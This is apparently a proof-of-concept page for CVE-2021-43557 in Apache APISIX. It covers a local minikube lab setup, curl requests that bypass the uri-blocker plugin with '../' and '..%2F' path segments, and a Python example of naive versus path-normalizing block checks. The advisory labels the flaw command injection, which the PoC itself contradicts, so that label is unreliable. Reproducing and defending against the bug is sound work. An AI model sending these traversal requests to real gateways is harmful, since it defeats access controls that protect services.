
PoC details: e454f8bba6310cc460cc2d89c85a10d81ba82b89

Source
Related vulnerability
Title: Apache APISIX command injection vulnerability (CVE-2021-43557)
Description: Apache APISIX is a cloud-native microservice API gateway from the Apache Software Foundation (US). It is built on OpenResty and etcd, supports dynamic routing and hot plugin loading, and is suited to API management in microservice architectures. Apache APISIX contains a command injection vulnerability that stems from design or implementation flaws introduced during the development of the network system or product.
Description
PoC for CVE-2021-43557
Introduction
# Installation

* install minikube
* install apisix:

```
helm repo add apisix https://charts.apiseven.com
helm repo add bitnami https://charts.bitnami.com/bitnami
helm repo update
kubectl create ns ingress-apisix
helm install apisix apisix/apisix \
  --set gateway.type=NodePort \
  --set ingress-controller.enabled=true \
  --namespace ingress-apisix \
  --version 0.7.2
kubectl get service --namespace ingress-apisix
```

* deploy app.yaml: `kubectl apply -f app.yaml`
* deploy routes: `kubectl apply -f routes.yaml`

Optional, if you need to change app images:
* (optional) build docker images:
  * `cd protected-service; docker build -t protected-service:0.0.1 .`
  * `cd public-service; docker build -t public-service:0.0.1 .`
* (optional) push docker images into minikube:
  * `minikube image load protected-service:0.0.1`
  * `minikube image load public-service:0.0.1`

# Exploitation

## Manually

To access the public service:

```
kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is http://127.0.0.1:9080/public-service/public -H 'Host: app.test'
```

should return 200

To access the protected service:

```
kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is http://127.0.0.1:9080/protected-service/protected -H 'Host: app.test'
```

should return 403

To access the protected service bypassing uri-blocker (percent-encoded and literal `../` variants):

```
kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is http://127.0.0.1:9080/public-service/..%2Fprotected-service/protected -H 'Host: app.test'
kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is http://127.0.0.1:9080/public-service/../protected-service/protected -H 'Host: app.test'
```

Both should return 200
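The bypass works because uri-blocker matched the raw, unnormalized request URI, so a `..%2F` or `../` segment that the upstream later resolves never hits the block rule. The following Python is an added example, not code from this PoC or from APISIX: a naive raw-URI prefix check beside a hardened check that normalizes the path first; the blocked prefix list and the route layout it assumes are constructed for the example.

```python
from urllib.parse import unquote

# Assumption for this example: the PoC's routes.yaml is taken to route
# /public-service/* upstream unchanged and to block /protected-service/*
# with uri-blocker. The prefix list itself is constructed, not the PoC's.
BLOCKED_PREFIXES = ("/protected-service/",)

# The four request paths exercised in the Exploitation section above.
POC_URIS = (
    "/public-service/public",
    "/protected-service/protected",
    "/public-service/..%2Fprotected-service/protected",
    "/public-service/../protected-service/protected",
)


def naive_is_blocked(request_uri: str) -> bool:
    """Prefix match on the raw request URI: dot segments and the
    percent-encoded slash are never resolved, so the bypass URIs pass."""
    return request_uri.startswith(BLOCKED_PREFIXES)


def normalize_path(request_uri: str) -> str:
    """Return the path the upstream will actually serve: query stripped,
    percent-decoding applied until stable, '.' and '..' segments resolved."""
    path = request_uri.split("?", 1)[0]
    for _ in range(3):  # bounded loop; also defeats double encoding
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    segments = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()  # never climbs above the root
            continue
        segments.append(seg)
    return "/" + "/".join(segments)


def hardened_is_blocked(request_uri: str) -> bool:
    """Match blocked prefixes against the normalized path instead."""
    return normalize_path(request_uri).startswith(BLOCKED_PREFIXES)


def evaluate(uris=POC_URIS):
    """Map each URI to (naive_blocked, hardened_blocked)."""
    return {u: (naive_is_blocked(u), hardened_is_blocked(u)) for u in uris}
```

Running `evaluate()` shows both traversal URIs slip past the naive check while the hardened check blocks them, matching the 200/403 behaviour described above.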
File snapshot

```
/data/pocs/e454f8bba6310cc460cc2d89c85a10d81ba82b89
├── [ 135] apisix_request.sh
├── [1.2K] app.yaml
├── [4.0K] protected-service
│   ├── [ 140] app.py
│   ├── [ 246] Dockerfile
│   └── [  12] requirements.txt
├── [4.0K] public-service
│   ├── [ 134] app.py
│   ├── [ 246] Dockerfile
│   └── [  12] requirements.txt
├── [1.8K] README.md
└── [ 912] routes.yaml

2 directories, 10 files
```